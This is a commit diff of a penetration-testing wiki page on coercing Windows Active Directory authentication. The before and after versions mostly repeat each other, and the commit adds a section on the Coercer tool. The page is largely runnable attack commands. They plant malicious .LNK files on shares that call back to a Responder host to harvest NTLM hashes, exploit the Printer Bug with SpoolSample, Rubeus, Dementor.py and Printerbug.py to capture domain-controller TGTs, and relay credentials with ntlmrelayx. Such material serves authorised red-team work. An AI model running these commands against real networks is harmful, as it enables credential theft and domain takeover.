pentesting/infrastructure/active-directory/coercing-authentication.md, before:

# Coercing Authentication

### Harvest NTLMv2/v1 Hashes with Write Access to Shares

The [following example](https://twitter.com/mpgn\_x64/status/1453018750253424643?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1453018750253424643%7Ctwgr%5E0fe6e46bc61c94f27278793c3b0620a3c2ed5bd6%7Ctwcon%5Es1\_\&ref\_url=https%3A%2F%2Fcdn.iframe.ly%2Fo0HzCyi%3Fapp%3D1) demonstrates performing this attack with CrackMapExec, however, it can also be performed by crafting a custom `.LNK` file.

1\. Enumerate the hosts shares

```bash
crackmapexec smb $ip -u $username -p $password --shares
```

2\. Create a malicious .LNK file calling back to your Responder.py IP

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP]
```

3\. After waiting and (hopefully) obtaining several NTLM hashes, cleanup the malicious file

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True
```

### The Printer Bug&#x20;

If a machine that we have compromised is configured with [unconstrained delegation](../../../tactics/credential\_access/steal-or-forge-kerberos-tickets/delegation/unconstrained-delegation.md) we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers.&#x20;

It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials.&#x20;

#### Enumerate Print Spooler Service

Enumerate Print Spooler service with ItWasAllADream:

```bash
# Enumerate Print Spooler with ItWasALlADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v

# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler

# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'

# SpoolerScan.ps1
.\SpoolerScan.ps1
```

#### Exploiting the Printer Bug with [SpoolSample.exe](https://github.com/leechristensen/SpoolSample)

1\. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this:

```bash
.\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap
```

2\. We can then execute `SpoolSample.exe` on the host to coerce authentication:

```bash
.\SpoolSample.exe $target $attacker
```

3\. After running `SpoolSample.exe` we should then aobserve a TGT on the attacker controlled system.

#### Remotely Exploiting the Printer Bug

* [Dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py)
* [Printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)

Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials:

```bash
# Exploiting the Printerbug with Dementor.py
dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn

# Exploiting the Printerbug with Printerbug.py
python printerbug.py $domain/$username:$password@$targetfqdn $attackerip

# Relay the authentication attempt to the target server
 ntlmrelayx.py -smb2support -t smb://$targetx
```

### Trigger NTLM Authentication over HTTP

```bash
## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
Invoke-WebRequest -UseDefaultCredentials
```

### References

{% embed url="https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack/" %}

Commit message:

GitBook: [#187] Additions to the 'Domain Enumeration' section.

pentesting/infrastructure/active-directory/coercing-authentication.md, after:

# Coercing Authentication

### Harvest NTLMv2/v1 Hashes with Write Access to Shares

The [following example](https://twitter.com/mpgn\_x64/status/1453018750253424643?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1453018750253424643%7Ctwgr%5E0fe6e46bc61c94f27278793c3b0620a3c2ed5bd6%7Ctwcon%5Es1\_\&ref\_url=https%3A%2F%2Fcdn.iframe.ly%2Fo0HzCyi%3Fapp%3D1) demonstrates performing this attack with CrackMapExec, however, it can also be performed by crafting a custom `.LNK` file.

1\. Enumerate the hosts shares

```bash
crackmapexec smb $ip -u $username -p $password --shares
```

2\. Create a malicious .LNK file calling back to your Responder.py IP

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP]
```

3\. After waiting and (hopefully) obtaining several NTLM hashes, cleanup the malicious file

```bash
crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True
```

### The Printer Bug&#x20;

If a machine that we have compromised is configured with [unconstrained delegation](../../../tactics/credential\_access/steal-or-forge-kerberos-tickets/delegation/unconstrained-delegation.md) we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers.&#x20;

It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials.&#x20;

#### Enumerate Print Spooler Service

Enumerate Print Spooler service with ItWasAllADream:

```bash
# Enumerate Print Spooler with ItWasALlADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v

# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler

# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'

# SpoolerScan.ps1
.\SpoolerScan.ps1
```

#### Exploiting the Printer Bug with [SpoolSample.exe](https://github.com/leechristensen/SpoolSample)

1\. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this:

```bash
.\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap
```

2\. We can then execute `SpoolSample.exe` on the host to coerce authentication:

```bash
.\SpoolSample.exe $target $attacker
```

3\. After running `SpoolSample.exe` we should then aobserve a TGT on the attacker controlled system.

#### Remotely Exploiting the Printer Bug

* [Dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py)
* [Printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py)

Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials:

```bash
# Exploiting the Printerbug with Dementor.py
dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn

# Exploiting the Printerbug with Printerbug.py
python printerbug.py $domain/$username:$password@$targetfqdn $attackerip

# Relay the authentication attempt to the target server
 ntlmrelayx.py -smb2support -t smb://$targetx
```

### Trigger NTLM Authentication over HTTP

```bash
## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
Invoke-WebRequest -UseDefaultCredentials
```

### Coercer

[Coercer](https://github.com/p0dalirius/Coercer) is a Python script which automagically attempt to coerce an arbitrary machine to an attacker controlled device in several ways.

```bash
# Basic use of Coercer.py
Coercer.py -d $domain -u $username -p $password --listener $attackerip --target $targetip
```

### References

{% embed url="https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack/" %}
